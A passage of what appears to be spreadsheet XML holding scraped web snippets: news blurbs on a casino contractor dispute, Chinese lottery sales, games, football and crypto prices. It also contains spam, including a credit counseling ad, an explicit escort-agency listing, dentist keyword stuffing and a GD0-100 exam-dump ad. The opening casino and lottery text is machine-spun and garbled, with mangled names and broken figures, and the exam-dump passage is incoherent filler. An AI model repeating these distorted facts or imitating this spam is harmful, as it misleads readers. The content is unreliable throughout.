in the same boat. ” Asking innocence: For its section, Las Vegas-headquartered Wynn Resorts Limited reportedly responded to these kind of allegations by means of stating it had fulfilled all of their financial obligations around building the enormous Middlesex County venue by means of paying most of the invoices posted by the main Encore Boston Possess contractor, Suffolk Construction . Wynn Destinations made the statement… “Encore Boston Possess has paid all accounts presented by simply our company, Suffolk Establishing. Sub-contractors give good results directly considering the contractor in no way Encore Birkenstock boston Harbor. Encore Boston Have has no excellent invoices by using Suffolk Development. The relationship around Wynn Vacation rentals Limited and even Suffolk Construction has always been caluroso and qualified. ” Contractor assurance: Suffolk Construction talker, Dan Antonellis, proclaimed the fact that the contractor is actually continuing ‘to work instantly with its sub-contractors to resolve just about any outstanding respectable issues’ along with remains self-confident that the organization will be able to ‘achieve satisfactory conclusions to close out there a successful undertaking. ’ Continuous a direction that commenced in January and aggregated sales regarding China’s associated with state-run lotteries reportedly fell into by 13. 7% year-on-year last month towards stand just over ?35. 5 thousand ($5. 1 billion). Pair plummets: Based on a Sunday report out of GGRAsia citing official info from the enormous nation’s Ministry of Financing myfreepokies.com, the China and tiawan Sports Lottery recorded Might sales regarding around ?19 billion ($2. 7 billion), which represented a drop of several 10% year-on-year, while its compatriot China Contentment Lottery sustained an even higher 15. seven percent deterioration to view its once a month revenues are available in at roughly ?16. 5 billion ($2. 3 billion). Equivalent consternation: The government figures reportedly likewise showed that overall revenues for the two lotteries previously had fallen by about 4. 7 percent year-on-year because start connected with January so that you can about ?177. 8 thousand ($25. eight billion). That trend ended up being purportedly guided by the The far east Welfare Lotto as its very similar revenues with the five-month time period dropped by simply 10. 6% to just in immediate need of ?81. being unfaithful billion ($11. 9 billion) although the India Sports Lottery managed to chalk up some 1% increase to hit a little bit shy with ?96 million ($13. 9 billion). Nationwide direction: GGRAsia reported that official details moreover demanded that aggregated lottery product sales for Can were reduced 28 associated with China’s 31st mainland provinces when compared with precisely the same 31-day time period in 2018. However , Guangdong Province kept the most rewarding market on the nation about some one 4 billion dollars people in spite of recording some sort of 9. 3% decline for monthly profits to ?16. 4 billion dollars ($2. a few billion). Jiangsu Province filled second location when it came to aggregated May lottery sales inside China although its tally of approximately ?15 billion dollars ($2. just one billion) manifested a very similar decline of just one. 2% although third-ranked Shandong Province really recorded some 3. five per cent year-on-year surge to bring in a bit beyond ?14. 4 billion ($2 billion). High Pass Rate GD0-100 Questions And Answers For Guidance Software Certification Even if Liu Guidance Software GD0-100 Questions And Answers Haizhu Guidance Software GD0-100 Questions And Answers wears a black knee high watershoe, the one foot is shallow and shallow, and it is Guidance Software Certification GD0-100 inevitable that a lot of water will be poured into the water boots. Less than a minute, all the people left in the yard GD0-100 Questions And Answers were Lusong. Guidance Software GD0-100 Questions And Answers Well, I will go. Large GD0-100 Questions And Answers brother must Certification Exam For ENCE North America have prepared the wine for you. Once reminded, we are beginning to worry about the lungs and the Certification Exam For ENCE North America desire to give up. We and you, Chairman Mao. So http://www.examscert.com/GD0-100.html Guidance Software GD0-100 Questions And Answers we simply don t pick it up. When he wakes up, he Guidance Software GD0-100 Questions And Answers is good for GD0-100 Questions And Answers us. Meng always keeps his eyes closed, but with a click , indicating that he Guidance Software GD0-100 Questions And Answers is listening I am observing the Guidance Software Certification GD0-100 agreement with the headhunting company. Feng Erzi has not been very concerned about how long he can live. Zhang Yue, Li Si and other GD0-100 Questions And Answers three people http://www.testkingdump.com are undoubtedly the first class brothers and sisters Guidance Software GD0-100 Questions And Answers in the city, but their men Guidance Software GD0-100 Questions And Answers are completely different. Some people may ask, Guidance Software GD0-100 Questions And Answers is the old Wei head doing this for the sake Certification Exam For ENCE North America of jealousy The answer is that you are not Naturally, I love to have a Guidance Software Certification GD0-100 good time, and the natural domineering can make him manage these idle things.</t>
  </si>
  <si>
    <t>First up, apologies for no review last Monday; my parents were visiting and they are Corrie...</t>
  </si>
  <si>
    <t>Many things would once have been torture this lifelong introvert. But then she decided to say goodbye to being shy. Not that it was going to be easy …</t>
  </si>
  <si>
    <t>3 Day A350 Trip to JAPAN I International Flight Attendant Life I Vlog 14 2019 The post 3 Day A350 Trip to JAPAN I International Flight Attendant Life I Vlog 14 2019 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>How long do you spend in the shower? A Queensland utility group believe a four-minute song could be the key to keeping showers shorter and in turn save water.</t>
  </si>
  <si>
    <t>Fortnite Season 10 – or rather Season X, as I've learned now – is due to be launched tomorrow, and Epic has provided the usual details on the exact date of the update. The developers also revealed that it would be a considerable download, so prepare your internet use accordingly. The August 1st release date of Fortnite Season 10 will bring its usual downtime early in the morning at 1:00 am PDT / 4:00 am PDT / 9:00 am BST. It is not yet clear exactly how long the standstill time will last, but the period is usually quite short. Once the servers are backed up, all the content of the new season will be available to you. "The size of the X season launch patches will be bigger than normal on all platforms," says Epic. Twitter. Based on the initial teasing and the announced Season 10 trailer (officially released since), it seems the new season is focused on merging old and new Fortnite content, which could facilitate a substantial download.</t>
  </si>
  <si>
    <t>Chris Robinson</t>
  </si>
  <si>
    <t>Hayden Ballantyne will end a four-month hiatus when he returns to Fremantle’s line-up this weekend for the first time since the opening round of the season.</t>
  </si>
  <si>
    <t>The Hong Kong and Macau Affairs Office of the State Council, which answers to China's cabinet, warned "should the chaos continue it is the entire Hong Kong society that will suffer."</t>
  </si>
  <si>
    <t>Richard Murray</t>
  </si>
  <si>
    <t>The cobbled streets of Dublin, kissing the Blarney Stone, Giant’s Causeway: the island of Ireland’s most popular attractions are justly celebrated.</t>
  </si>
  <si>
    <t>With the potential for greater market volatility, fixed income allocations might require a second look The post Is the correlation between stocks and bonds broken? appeared first on Advisor.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Spotify's 'Hateful Conduct' Policy Drags The Music Industry Into The #MeToo Moment Tuesday 23 July 2019 11:33 PM UTC-05 | Tags: credit-counseling from http://creditcounselingconsumer.home.blog/paterson-new-jersey-consumer-credit-counseling-service-888-551-1270/ The streaming giant’s new policy on artists who engage in ‘hateful conduct’ is a half-measure, but it demonstrates the power the company now wields — and the challenge it now faces. https://www.youtube.com/watch?v=EOwqUuGLS4Y https://www.youtube.com/channel/UC_dTa7VuD6HLp7H4rhc40TQ/videos copyright © 2016 Privacy Policy Tags: credit-counseling</t>
  </si>
  <si>
    <t>Crypto traders are in a panic today after a radical bearish movement sent Bitcoin to drop over $700 within less than ten minutes, pushing down the price from above the $10,100 region to below $9400. Spectators are yet to understand the cause of the volatility as the cryptocurrency started today’s trading session with high energy moving up to the $10,000 support within an hour. At the time of writing, bitcoin is trading at $9,400. What can be the caused is the typical volatility surrounding Bitcoin’s weekend trading, as mentioned on CryptoPotato’s yesterday’s BTC analysis. The rest of the crypto market is also in red, with significant altcoins suffering significant losses between 2% to 6% on the daily. The total market cap is $261 billion | Bitcoin’s market cap is $168 billion | BTC dominance at 64.4% Bitcoin 1-hour chart (Bitstamp) Major Crypto Headlines Bitcoin &amp; Soccer: The Rise of Cryptocurrency Sponsorships and Partnerships. Digital currencies are on the spotlight of mainstream media as famous soccer teams in different leagues around the world continue to partner with crypto projects for sponsorship. Binance Exchange’s Charity Falls Short of Transparency Goals. The transparency of Binance Charity Foundation (BCD) is being questioned following the face that the organization only accounted for $6 million donations. The last number is a lot less than half of the $13 million donations raised in the previous year. Huawei CEO Calls on China to Create a Rival to Facebook’s Libra Crypto. The Chinese telecommunication giant noted that it is time for China’s government to create its cryptocurrency instead of waiting for the launch of Facebook’s Libra. Most Significant Winners and Losers Dexter G (256.17%) DXG holders are probably in a euphoric mood, unlike the market sentiment. The altcoin, which traded around the $0.14 mark earlier today, saw a massive surge of over 250% within the last couple of hours. What caused the sudden price upbeat is still not clear. The token, at the time of writing, trades at $0.519 with a daily trading volume of $492,225. Qwertycoin (47.64%) A 47.64% rise against the USD placed Qwertycoin (QWC) as the second most significant winner in the market within the last 24 hours. The coin has been on a gradual increase over the previous 30 days, and today is just another green day for traders. At the time of writing, the coin is exchanging hands at $0.000054 with a daily volume of $105,103 across all exchanges. GINcoin (-70.51%) The most significant loser in the market today is GINcoin (GIN). The coin is down by over 70% against the USD with its current price hovering around $0.054. GIN lost 60.3% of its value over the last seven days, and 74.6% on the monthly chart. The coin has a 24-hour trading volume of $71,838 and a market cap of $356,246. * data according to CoinMarketCap Be the first to know about our price analysis, crypto news and trading tips: Follow us on Telegram or subscribe to our weekly newsletter.</t>
  </si>
  <si>
    <t>Pictures have emerged of soon-to-be Newcastle United striker Joelinton arriving at St James’ Park ahead of his move from Hoffenheim. Here’s some pictures shared on social media over the last few moments, showing the Brazilian getting his first glimpse of the stadium ahead of his club record move: Looks like some new faces at St James Park…. but who #nufc #newcastleunited @SkySports_Keith @ChronicleNUFC @lee_ryder #deadlineday pic.twitter.com/T3ZE6XJxsZ— Kris Kross (@KRISKROS5) July 23, 2019 @stevewraith @SkySports_Keith the wife is at the footy and looks like joelinton is there pic.twitter.com/ZjukKjwWqg— a (@TP_JMP) July 23, 2019 Considering news of his ‘imminent’ arrival had gone a little quiet over the past few days, this appears to be proof that he is in fact all set to sign over the coming 24 hours. The Chronicle have also confirmed in the last few moments that his arrival is due to be announced any time now, with the Hoffenheim star looking set to become our first signing of the summer. With there being just 16 days left until the window slams shut, let’s hope Joelinton’s arrival is followed by several others between now and August 8th. It’s about time we got our skates on! (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>Pinned onto Uncategorized Fennemore Craig expands its Phoenix office – Fennemore Craig, added two lawyers to its practice. Madison Major and Mario Vasta have joined the firm’s Phoenix office. “It is a pleasure to welcome Madison and Mario to the firm,” Steve Good, said managing partner of Fennemore Craig. “In a legal environment in which exce… – azbigmedia.com/… Source by eazonline</t>
  </si>
  <si>
    <t>Jason Steger</t>
  </si>
  <si>
    <t>There has been no Australian on the Booker shortlist since 2014.</t>
  </si>
  <si>
    <t>Adam Cooper</t>
  </si>
  <si>
    <t>Simone Semmens was dressed elegantly in a black jacket a court hearing on Tuesday, but prosecutors want her wearing drab prison garb for at least the next three years.</t>
  </si>
  <si>
    <t>gtechwebstore</t>
  </si>
  <si>
    <t>Mini and tiny, upgraded mini look, made from aluminum alloy, the smaller the better Gravity principle is used for ready to put down, ready to use and ready to take away, it locks automatically by using of gravity when putting down the cell phone and it unlocks automatically by losing gravity when taking away the cell phone Gear-free design, use at ease, firm and noise free There is battery cahrging hole reserved, which satisfies the convenient and timely charging demand Product material: aluminum alloy Product size: 93mm x 86mm x 84mm We also have popular cables from Baseus Baseus 5A USB to USB-C / Type-C Double Loop Fast Charging Cable 1m $5.61 or 2m $7.73 Baseus 40W 1m 5A USB to Type-C Purple Ring HW Flash Data Sync Charge Cable $6.33 Baseus Cafule Series USB-C / Type-C PD 2.0 60W Flash Charge Cable $6.52 1m or $7.24 2m Baseus 40W Type-C / USB-C HW Double-sided Blind Mate Quick Charging Cable, Length : 1m $7.00 Baseus 5A USB to USB-C / Type-C Dual-modet Fast Charging Cable, Cable Length: 1m $7.58 Baseus PD2.0 60W 20V 3A USB-C / Type-C Fast Charging Cable 1m $9.08, 2m $10.15</t>
  </si>
  <si>
    <t>Welcome to escorts in Three Cocked Hat NR14, covering the whole area of Norfolk. We have escorts serving the flats, homes and local hotels in Three Cocked Hat and the surrounding Norfolk areas. Three Cocked Hat Escort Norfolk Escort Services Three Cocked Hat Escorts - Girls Who Know How to Fulfill You in Norfolk Men often tend to underestimate the powers of women. Women have plenty of skills, and if they want, they can achieve a lot of things, and they can even help you make a lot of things. If you are having a slump time in your business or your career, there are several ways in which a woman can help your business grow in ways that you would not have thought about before. There is no reason for you to worry even if you do not have a girlfriend since all of these services would be provided to you by Three Cocked Hat escorts. You have spent the right amount of time with your organization, and you have been promoted, but you still think that you deserve a higher title against the amount of determination and hard work you have put. To realize your official position, you should not only work hard on the office task assigned to you, but you should also concentrate on how to impress your superiors. Three Cocked Hat escorts are women who receive hundreds of compliments from their men because of the type of services that they provide them. There are quite a lot of escorts in the area, but not all of them can deliver what they promise. When you hire a beautiful companion tonight, only go for the best one who will compliment your personality. Go for the best escort agency and finding the best escort would not be very difficult. She can perform for you, and she can wonderfully caress you. You can evaluate the services of these ladies and compare them to the services provided by other escorts to know where these wonderful ladies stand. Escorts in Three Cocked Hat are women who love to be around men, and that is the only reason why they take up escorting in the first place. These women have other day jobs, but they are escorts too because it allows them to meet interesting men who they can entertain. In real life, it would not be likely that you would be able to be with a woman who can be the star of the night, but in Three Cocked Hat, anything is possible. Find a secluded corner and discover your escort from private quarters! There are several different types of escorts in the area who could attend to all your needs and one to custom-fit your specific desires. Just discovering the number of things that they will be able to do for you is sheer fun. Escort Name: Nala Location: Three Cocked Hat (NR14 6) Nationality: Welsh Spoken Language: English, Portuguese Age: 22 years old Weight: 63.2kg (139lb) (9st - 13lb) Height: 5 feet 5 inches (165.10cm) Dress Size: L Shoe Size: 37 Hair Leigh: Long Hair Color: Bronde Eye Color: Hazel Breast: Natural Breast Size: DD Pubic Hair: Shaved Mostly Tattooed: No Piercings: Yes Smoking: No Drinking: No Availability Area: Three Cocked Hat Outcall: Norfolk Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Nala Escort Name: Phoenix Location: Three Cocked Hat (NR14 6) Nationality: Romanian Spoken Language: English, French Age: 28 years old Weight: 52.3kg (115lb) (8st - 3lb) Height: 5 feet 6 inches (167.74cm) Dress Size: M Shoe Size: 35 Hair Leigh: Medium-Length Hair Color: Blonde Eye Color: Hazel Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: Yes Availability Area: Three Cocked Hat Outcall: Norfolk Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Phoenix Escort Name: Clarise Location: Three Cocked Hat (NR14 6) Nationality: Scottish Spoken Language: English, French Age: 21 years old Weight: 56.4kg (124lb) (8st - 12lb) Height: 5 feet 9 inches (175.26cm) Dress Size: M Shoe Size: 39 Hair Leigh: Long Hair Color: Coffee Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: Yes Piercings: No Smoking: No Drinking: Yes Availability Area: Three Cocked Hat Outcall: Norfolk Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Clarise Escort Name: Trinity Location: Three Cocked Hat (NR14 6) Nationality: Australian Spoken Language: English, Croatian Age: 19 years old Weight: 58.6kg (129lb) (9st - 3lb) Height: 5 feet 7 inches (170.18cm) Dress Size: S Shoe Size: 43 Hair Leigh: Long Hair Color: Black Eye Color: Green Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Three Cocked Hat Outcall: Norfolk Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Trinity Escort Name: Serena Location: Three Cocked Hat (NR14 6) Nationality: Dominican Spoken Language: English, Portuguese Age: 20 years old Weight: 53.2kg (117lb) (8st - 5lb) Height: 5 feet 5 inches (165.10cm) Dress Size: M Shoe Size: 42 Hair Leigh: Very Short Hair Color: Red Eye Color: Brown Breast: Natural Breast Size: C Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Three Cocked Hat Outcall: Norfolk Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Serena Escort Name: Charlize Location: Three Cocked Hat (NR14 6) Nationality: Korean Spoken Language: English, French Age: 21 years old Weight: 49.5kg (109lb) (7st - 11lb) Height: 5 feet 6 inches (167.74cm) Dress Size: S Shoe Size: 40 Hair Leigh: Short Hair Color: Red Eye Color: Hazel Breast: Silicone Breast Size: DD Pubic Hair: All Natural Tattooed: No Piercings: No Smoking: Occasionally Drinking: Yes Availability Area: Three Cocked Hat Outcall: Norfolk Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Charlize Escort Name: Verity Location: Three Cocked Hat (NR14 6) Nationality: Swiss Spoken Language: English, French Age: 28 years old Weight: 62.3kg (137lb) (9st - 11lb) Height: 5 feet 5 inches (165.10cm) Dress Size: L Shoe Size: 36 Hair Leigh: Very long Hair Color: Tiger Eye Eye Color: Hazel Breast: Natural Breast Size: DD Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Three Cocked Hat Outcall: Norfolk Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Verity Escort Name: Delilah Location: Three Cocked Hat (NR14 6) Nationality: British Spoken Language: English, Portuguese Age: 32 years old Weight: 58.2kg (128lb) (9st - 2lb) Height: 5 feet 8 inches (172.72cm) Dress Size: XXL Shoe Size: 43 Hair Leigh: Medium-Length Hair Color: Dusty Rose Eye Color: Brown Breast: Silicone Breast Size: B Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: No Drinking: Occasionally Availability Area: Three Cocked Hat Outcall: Norfolk Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Delilah Three Cocked Hat Brazilian Escort, Three Cocked Hat Scottish Escort, Three Cocked Hat Walsh Escort, Three Cocked Hat Independent Escort, Three Cocked Hat Female Escort, Three Cocked Hat Cheap Escort, Three Cocked Hat Chinese Escort, Three Cocked Hat Blonde Escort, Three Cocked Hat Incall Escort, Three Cocked Hat French Escort, Three Cocked Hat Black Escort, Three Cocked Hat Outcall Escort, Three Cocked Hat Bisexual Escort, Three Cocked Hat Irish Escort, Three Cocked Hat Mature Escort, Three Cocked Hat British Escort, Three Cocked Hat Brunette Escort, Three Cocked Hat Horny Escort, Three Cocked Hat Asian Escort, Three Cocked Hat Gay Escort, Three Cocked Hat Busty Escort, Three Cocked Hat Young Escort, Three Cocked Hat Male Escort, Three Cocked Hat Ebony Escort, Three Cocked Hat Indian Escort, Three Cocked Hat Indian Escort, Three Cocked Hat Massage Escort , Three Cocked Hat Polish Escort, Three Cocked Hat Porn Escort, Three Cocked Hat Teen Escort, Three Cocked Hat Best Escort, Three Cocked Hat Agency Escort, Three Cocked Hat Erotic Escort, Three Cocked Hat Spanish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Three Cocked Hat appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>Ensure your family receives the best oral care possible with Bathurst Centre Dental Care’s exceptional preventive and cosmetic dental services 1/6. Forman Dental Care, in Vaughan, ON, is an excellent clinic with services in orthodontics, family, cosmetic, and sedation dentistry. The services are rendered by a leading Vaughan dentist, Ravi Vasudeva. Dr. Ravi Vasudeva Dentist Atlantis Dental. Cosmetic Dentist Near Vaughan Ontario The Best 10 Dentists near Woodbridge, Vaughan, ON Showing 1-10 of 35 Vaughan Woodbridge Health &amp; Medical Dentists. Dr. Jacqueline Ha is Cosmetic Laser Implant Dentist providing excellent orthodontic services to all ages. Her office is located at the. . Most Popular Dentist In Vaughan Ontario Two more suspected drownings in Southwestern Ontario, including a Best Cosmetic Surgeons in Vaughan, ON – Dr. Keven O'Grady, Institute of Dermatology &amp; Cosmetic Surgery, Philip Solomon, MD FRCSC, Cory Torgerson, Hair Club, U Eye Laser Cosmetic, Leila Kasrai, MD, Rice Plastic Cosmetic Surgery, Mahmood Kara, MD, The Best 10 Dentists near Woodbridge, Vaughan, ON Showing 1-10 of 35 Vaughan Woodbridge Health &amp; Medical Dentists. Dr. Jacqueline Ha is Cosmetic Laser Implant Dentist providing excellent orthodontic services to all ages. Her office is located at the. . Cosmetic Dental Clinic Near Vaughan Ontario Choose from 3 Plastic Surgery Clinics in Vaughan find the best one for you. See popular locations and treatments. Aviva Cosmetic and Laser Clinic 1802 Avenue Road, Toronto, M5M 3Z1 Rating from 1 Review I look forward to going backJimmy, Canada, 04. Signature Cosmetic Clinic – Vaughan, Ontario L6A4N9 – Rated 4.3 based on 23 Cosmetic dentists in Vaughan will provide help If you are not happy with your teeth! We provide top-quality cosmetic dentistry and orthodontics services and are willing to get your. Preferred Dental Clinic Near Vaughan Ontario Cosmetic Dentist Near Vaughan Ontario The Best 10 Dentists near Woodbridge, Vaughan, ON Showing 1-10 of 35 Vaughan Woodbridge Health &amp; Medical Dentists. Dr. Jacqueline Ha is Cosmetic Laser Implant Dentist providing excellent orthodontic services to all ages. Her office is located at the. . Most Popular Dentist In Vaughan Ontario Two more suspected drownings</t>
  </si>
  <si>
    <t>Number 1 Dentist Near Vaughan Dentist Vaughan 1 review that is not currently recommended Is this your business? Once you’ve claimed, you can: Immediately update business information. Toronto Maple Leafs star Mitch Marner remains unsigned as he prepares to host a charity event this week near the city. . Top Dental Clinic Near Vaughan Ontario Best Walk-in Clinics in Vaughan, Best Dentists in Woodbridge, Vaughan, ON – Woodbridge Vaughan Dental, Venditti Ben Dr Dentist, Innovation Drive Dental, Today's Family Dental Centre, Woodbridge Dental Arts, Sunny Day Dental, Pomposa Frank Dr Dentist, Roysun Dental Centre, EASTENDERS actor Dean Gaffney reportedly begged a stranger for x-rated pictures of her breasts and bum. The newly single. Reviews on Dentist Reviews in Vaughan, ON – Rosedale Family Dental Centre, Marketplace Dentistry, Vellore Corners Dentistry, BC Dental Care, Woodbridge Dental Centre, Dentistry On Thornhill Woods, Dr. Gina Ha &amp; Associates, Mackenzie Dental Centre, Golsen Family Dentistry Offers Cosmetic Dentistry in Alpharetta, GA – Alpharetta, GA – Golsen Family Dentistry is the top-rated dental practice in Alpharetta. techniques and treatments to. The Best 10 Dentists near Thornhill, Vaughan, ON Showing 1-10 of 194 Vaughan Thornhill Health &amp; Medical Dentists. This is the best dentist I have ever been to, hands down. My fiancé has been trying to get me to try out North York Dental Clinic for a while 9. Handpicked Top 3 Children Dentists in Vaughan. We check reviews, ratings, reputation, history, complaints, satisfaction, trust. Infant Exams at 6 months of Age Specializes in Preventative Dental Techniques &amp; Dental Sealants Provides the Highest info@. 2 reviews of Vaughan Children's Dentistry "This place is by far the best dentistry for kids. My kids absolutely loved it. Will definitely be coming back. If they had a dentist clinic like this when I was growing up I would have loved the dentist. Quentin Taratino has curated a series of films that influenced the creation of Once Upon A Time In Hollywood – After returning to Los Angeles from a group therapy session, documentary filmmaker Bob Sanders (Robert Culp) and his wife, Carol (Natalie Wood), find themselves becoming vigilante couples counsellors, Konta’s attention to detail is why she is on a journey to win Wimbledon – took a job at a hotel near the Excel Arena in East London, and her love of music was partly kindled by the buzz around the. See the Top 10 Dentists &amp; Orthodontists Near Me. Top Rated Local® aggregates the ratings &amp; reviews of the best businesses from the most popular review sites and then ranks.</t>
  </si>
  <si>
    <t>Seven races will be run and won at Warwick Farm today.</t>
  </si>
  <si>
    <t>Product Name: 301 Moved Permanently Click here to get 301 Moved Permanently at discounted price while it’s still available… All orders are protected by SSL […] The post 301 Moved Permanently appeared first on Sell Me Something. Source link</t>
  </si>
  <si>
    <t>Bethpage’s five courses, including the renowned Black, are the newest additions to the Youth on Course organization’s participating course roster, which now includes more than 1,200 of the almost 16,700 U.S. courses. Source: Sports Business News</t>
  </si>
  <si>
    <t>Dota Underlords is still in the process of accessing early access, which means that some major game features are subject to change. In the next update, this means a complete overhaul of the classified system which should make progress clearer. Valve has announced its intention to build a more visible rank progression for some time, but the developers have explained in detail what is changing. You will now have two separate queues for classified and occasional matchmaking. Casual will try to challenge you against equally talented opponents, but will decrease the pressure you are under on your rankings. You can enter the occasional queue alone or with friends, and you can always face challenges and accomplish every day. Valve indicates that this mode is intended to allow you to "test new versions or meet these elusive challenges". Ranked will require you to queue up solo and will match you based on your current rank. (Of course, you can get hits and dailies here.) New accounts will have to play five games before entering the leaderboard, but existing players will have immediate access when the update is available. The filing system also becomes much clearer. It is now a simple number that increases or decreases according to your ranking in a match, and each rank is assigned to certain ranks. Bonus points are awarded for each minor level. The graph above shows how it works. These changes will be posted in the next update. In the official announcement, Mr. Valve said, "The ranked system serves two design goals that are fundamentally in tension: some players want the system to measure progress, while others want it to work. a clear and objective measure of skills. We hope that this new, more transparent design will achieve a better balance between these goals. But as with everything about Underlords, nothing is definitive and we will continue to talk about it, as well as other features, based on your comments. " INFO Buy now</t>
  </si>
  <si>
    <t>Oxblogger</t>
  </si>
  <si>
    <t>Maybe I’m getting older, but the summers seem to be shorter and shorter. Perhaps the season is getting longer and longer. Either way, the window in which club’s are supposed to refresh and renew seems to get smaller as time passes. Last year, the World Cup truncated the summer into a few short hysterical weeks; signings seemed rushed, preparations lacking in preparation. We toured Ireland where friendlies were adjusted to accommodate England games, everything seemed to crash on top of each other. There have been no such distractions this year, but the summer has been short and quiet. Signings have come slowly, but they seem solid, unlike the follies of Ricky Holmes or Sam Smith. There hasn’t been the panic, nor the hysteria, though the disquiet has ratcheted up with the news that Gavin Whyte is off to Cardiff (and then appeased by the signing of Ben Woodburn). Perhaps fans are settling to our status; too small to go up, too big to go down. We can search for someone to blame, but we’re suffering the consequences of something out of our control – hyper-inflation in the Premier League. We’re a club with the turnover of a reasonably sized supermarket trying to retain players who interest clubs with huge cash resources. Whyte, Curtis Nelson, Marcus Browne and even Tsun Dai are all heading for clubs benefitting from Premier League cash. Promotion seasons like 2010 and 2016 were characterised by a relentless pursuit of signings throughout the summer. That hasn’t been the case this year, and if that’s an indication of intent; a promotion tilt is unlikely. Those spending sprees were partly about organisation – good scouting – but also money. A club that can release cash at a time when it’s scarcely available, is a club that is more likely to have a successful season – or so it seems. It seems fairly obvious that the cash isn’t available, at least not enough to make signings quick and easy. That’s not necessarily a bad thing – the quickest way to do a deal is to overpay and the likes of Smith and Holmes should remind us of the impact of that mistake. Maybe the money doesn’t exist or is earmarked for other things. It’s possible that we have owners that are striking a balance between short term performance and long-term stability. Kassam starved the team of resource to fund his new stadium, Lenagan and Eales did the opposite (although admittedly there wasn’t a stadium to invest in). The Whyte situation has skewed the argument; we thought we’d keep him, and so losing has had a disproportionate impact on morale. But, looking at the squad, seven players that played more than 10 games last season have left including Smith and Holmes. Five (so far) have signed, with another couple coming back from injury. In terms of numbers, it’s not that different to the end of last year. There are gaps, of course, it’s easy to pick a figure out of the sky as to the number of players we need and panic, but most obviously we lack a true striker (20 goals, 15 goals, whatever) and we still look thin at the back. We’re not robust enough to withstand the loss of senior players to long-term injury, but there remains a solid core, so we’re not quite as vulnerable as it might seem. Good seasons rely on luck, at the moment we would need more than our fair share. A couple more signings before the end of the month will help a lot. The shape of the division has changed. Last year, there were one or two serious contenders and a raft of ‘others’. That was evident in our own performance, where we were able to sit at the bottom of the table throughout the year, and then, with a couple of wins suddenly find ourselves in mid-table. This year, that top cabal has grown – Sunderland, Portsmouth and Ipswich look obvious contenders for promotion, Doncaster, Rotherham, Peterborough are well resourced and organised and should have enough to fight for the play-offs. The result will squeeze a team like us. At the bottom also, some of the positions appear to have been established – Bury are already 12 points in the hole and facing relegation or extinction, Bolton may follow. Who knows what will happen with Coventry? In addition, there’s a batch of teams – Wycombe, Rochdale, Wimbledon, perhaps Accrington who will eventually succumb to relegation due to a lack of resources and are probably on borrowed time. For football in general, this is not good, but for us and our prospects, it should act as the cushion we need. What is left are teams like us – struggling to go up, with too much to go down. It’s probably a reflection of who were are, maybe who we’ve always been – a reasonable third-level club. Getting out of that trajectory is going to require effort and money, and perhaps that’s where the season’s focus lies. What Michael Appleton started to build was largely destroyed by Pep Clotet, Karl Robinson has wrestled to establish a platform – let’s not forget, this is only his third transfer window. Success next season might be about creating foundations. But, while foundations are sensible, where are we going to get our kicks? In the league, perhaps we’ll be a disruptor, derailing a couple of promotion bids, sending a team down, that kind of thing. The odd last minute win, a couple of big away days. We should probably hope for a bit of a cup adventure to lighten the mood. Perhaps even a decent shot at the Checkatrade Trophy. The immediate challenge will be establishing a decent start. Last year’s was a disaster and it took months to recover. The season is long, so a tricky start doesn’t mean catastrophe, but with Sunderland and Peterborough (twice) in the opening week, a poor start might tip the sense of acceptance into one of frustration. Karl Robinson doesn’t need that pressure again. Looking at the Absolute State of Oxford United Survey and what fans are looking for from the season; we want financial stability; no more winding up orders, greater ownership from the board and a reduction of influence from Firoz Kassam. There were a number of comments about removing Karl Robinson, some want Michael Appleton back although not many saw Robinson’s sacking as a goal. A squad with a decent striker is a must with the aim of achieving somewhere between consistency and promotion, last year’s rollercoaster is not needed. However, above all this were two aims for the season – to sort the stadium out and have a clear achievable plan for the future, and, reignite lost passion for the club amongst fans. Both of these things are the hardest to achieve, but, if anything can be done on those fronts, then the club will have had a successful season.</t>
  </si>
  <si>
    <t>That’s what markets and franchises like the Kings have to do to get free agents—over pay.) Source: Sports Business News</t>
  </si>
  <si>
    <t>Matthew Doran</t>
  </si>
  <si>
    <t>Labor says Raheem Kassam, who once suggested Scotland's First Minister Nicola Sturgeon should have her legs taped shut so she "can't reproduce", should not be given a visa to enter the country to attend a conservative conference next week.</t>
  </si>
  <si>
    <t>Australian journalist and filmmaker James Ricketson spent 15 months in a notoriously overcrowded and under-resourced prison in Cambodia until he was pardoned by local authorities. Now back in Australia, he shares a new perspective on how to find happiness and what is important in life.</t>
  </si>
  <si>
    <t>26 July 2019 – BBC News Health watchdog body the RQIA carried out unannounced visits at the Tyrone and Fermanagh Hospital in 2016 and Londonderry’s Grangewood in 2017 and found evidence of the under-reporting of adverse incidents at both. As a result of those inspections, the Western Health Trust committed to reviewing procedures in relation to such incidents, but further unannounced visits at the two hospitals this year again found issues over the recognition and management of adverse incidents. Source</t>
  </si>
  <si>
    <t>Shery Russ</t>
  </si>
  <si>
